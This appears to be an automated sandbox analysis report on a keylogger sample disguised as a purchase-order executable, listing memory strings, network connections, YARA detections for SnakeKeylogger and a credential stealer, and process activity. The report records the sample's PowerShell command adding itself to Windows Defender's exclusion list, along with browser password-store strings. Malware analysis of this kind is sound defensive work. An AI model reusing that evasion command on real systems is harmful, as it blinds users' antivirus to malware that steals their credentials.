                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.00000000029FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.00000000029FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002B2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49728 version: TLS 1.2

                  System Summary

                  barindex
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: initial sampleStatic PE information: Filename: Purchase Order 007823-PO# 005307.exe
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 0_2_00B8D5BC0_2_00B8D5BC
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 0_2_066D1DD80_2_066D1DD8
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 0_2_066D42680_2_066D4268
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 0_2_066D22100_2_066D2210
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 0_2_066D38B80_2_066D38B8
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_0296D2786_2_0296D278
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_029653626_2_02965362
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_0296C1466_2_0296C146
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_0296C7386_2_0296C738
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_0296C4686_2_0296C468
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_0296CA086_2_0296CA08
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_0296E9886_2_0296E988
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_029669A06_2_029669A0
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_02963E096_2_02963E09
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_0296CFA96_2_0296CFA9
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_02966FC86_2_02966FC8
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_0296CCD86_2_0296CCD8
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_02969DE06_2_02969DE0
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_0296F6306_2_0296F630
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_0296FA886_2_0296FA88
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_029629E06_2_029629E0
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeCode function: 6_2_0296E97A6_2_0296E97A
                  Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1355068640.0000000006A00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order 007823-PO# 005307.exe
                  Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1348177290.000000000076E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Order 007823-PO# 005307.exe
                  Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000000.1324301927.0000000000132000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXpkT.exeF vs Purchase Order 007823-PO# 005307.exe
                  Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1350435179.000000000285E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Purchase Order 007823-PO# 005307.exe
                  Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1355716649.0000000007252000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Purchase Order 007823-PO# 005307.exe
                  Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order 007823-PO# 005307.exe
                  Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Purchase Order 007823-PO# 005307.exe
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Purchase Order 007823-PO# 005307.exe
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3790025869.0000000000AF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Purchase Order 007823-PO# 005307.exe
                  Source: Purchase Order 007823-PO# 005307.exeBinary or memory string: OriginalFilenameXpkT.exeF vs Purchase Order 007823-PO# 005307.exe
                  Source: Purchase Order 007823-PO# 005307.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Purchase Order 007823-PO# 005307.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, --m.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, uuVRExIJeZcn6YBP0r.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, WqcMW7fGuvAyFrWZNB.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, WqcMW7fGuvAyFrWZNB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, WqcMW7fGuvAyFrWZNB.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, uuVRExIJeZcn6YBP0r.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, uuVRExIJeZcn6YBP0r.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, WqcMW7fGuvAyFrWZNB.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, WqcMW7fGuvAyFrWZNB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, WqcMW7fGuvAyFrWZNB.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, WqcMW7fGuvAyFrWZNB.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, WqcMW7fGuvAyFrWZNB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, WqcMW7fGuvAyFrWZNB.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/6@4/4
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order 007823-PO# 005307.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drgocfdm.ome.ps1Jump to behavior
                  Source: Purchase Order 007823-PO# 005307.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Purchase Order 007823-PO# 005307.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3791088512.0000000002C3A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Purchase Order 007823-PO# 005307.exeReversingLabs: Detection: 36%
                  Source: Purchase Order 007823-PO# 005307.exeVirustotal: Detection: 31%
                  Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess created: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess created: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess created: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess created: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeSection loaded: appresolver.dllJump to behavior
